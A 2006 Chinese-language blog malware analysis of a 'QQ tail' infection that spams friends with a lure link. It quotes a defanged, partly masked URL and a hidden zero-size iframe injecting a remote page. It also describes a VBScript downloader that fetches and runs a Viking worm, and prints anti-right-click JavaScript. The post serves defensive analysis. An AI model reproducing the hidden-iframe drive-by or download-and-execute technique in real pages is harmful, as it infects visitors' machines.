endurer 原创
2006-08-01 第1版
一个网友的电脑中了QQ尾巴,打开QQ好友的对话框就会自动发出如下信息:
---------------------------------
麻烦帮我朋友投个票啦!她正在竞选QQ小姐,参选Q-Zone空间上有她近照,点击为她增加人气,先谢谢喽……
hxxp://Q-Zone.****qq.C0M.%62%30%76%2E%63%6E/cgi-bin/Photo=No.****947561
---------------------------------
点击该链接,会打开一个标题为”手机游戏-彩铃-视频-图片-综合性手机服务网站.支持各种手机机型下载,支持移动、联通!”的网页,并弹出“移动_联通,谢谢您的参与! ”的对话框。
网页中包含如下代码:
---------------------------------
<iframe src=hxxp://web***1.%33%39%63%6F%6D%2E%6F%72%67/ms***/mm***.htm width=0 height=0></iframe>
---------------------------------
mm***.htm 的代码为加密过的脚本程序。
脚本程序共有2部分。
第1部分脚本程序 使用的是JavaScript,其功能是阻止用户选择网页内容、屏蔽右键关键菜单等,以及第二部分脚本程序正确运行所需要的数据。
解密后的代码为见 附录1。
第2部分脚本程序 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把某个网站(这里不给出网址了)的MS目录中的文件 HOU1.EXE 保存为 IE临时文件夹中的 g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
Kaspersky 将 HOU1.EXE 报为 Worm.Win32.Viking.r。
瑞星 将 HOU1.EXE 报为 Worm.Viking.aa。
关于这个蠕虫的更多信息,可参考:
遭遇Viking/威金新变种、Trojan-PSW.Win32.WOW.do等(一)
http://blog.csdn.net/Purpleendurer/archive/2006/07/21/950135.aspx
附录1 第1部分脚本程序解密后的代码:
<script language=javascript>
---------------------------------
dH6=2476;
if(document.all)
{
function _dm()
{
return false
};
function _mdm()
{
document.οncοntextmenu=_dm;
setTimeout("_mdm()",800)
};
_mdm();
}
document.οncοntextmenu=new Function("return false");
function _ndm(e)
{
if (document.layers||window.sidebar)
{
if(e.which!=1)
return false;
}
};
if(document.layers)
{
document.captureEvents(Event.MOUSEDOWN);
document.οnmοusedοwn=_ndm;
}
else
{
document.οnmοuseup=_ndm;
};
sA75=187;
hX40=4188;
function _dws()
{
window.status = " ";
setTimeout("_dws()",100);
};
_dws();
pN54=3615;
oG10=1048;
function _dds()
{
if(document.all)
{
document.onselectstart=function ()
{
return false
};
setTimeout("_dds()",700)
}
};
_dds();
nT70=2191;
oW82=7332;
fH87=190;
rN34=1330;
qA94=2473;
fY59=6474;
wI64=9332;;
_licensed_to_="TEAM iPA";
</script>
---------------------------------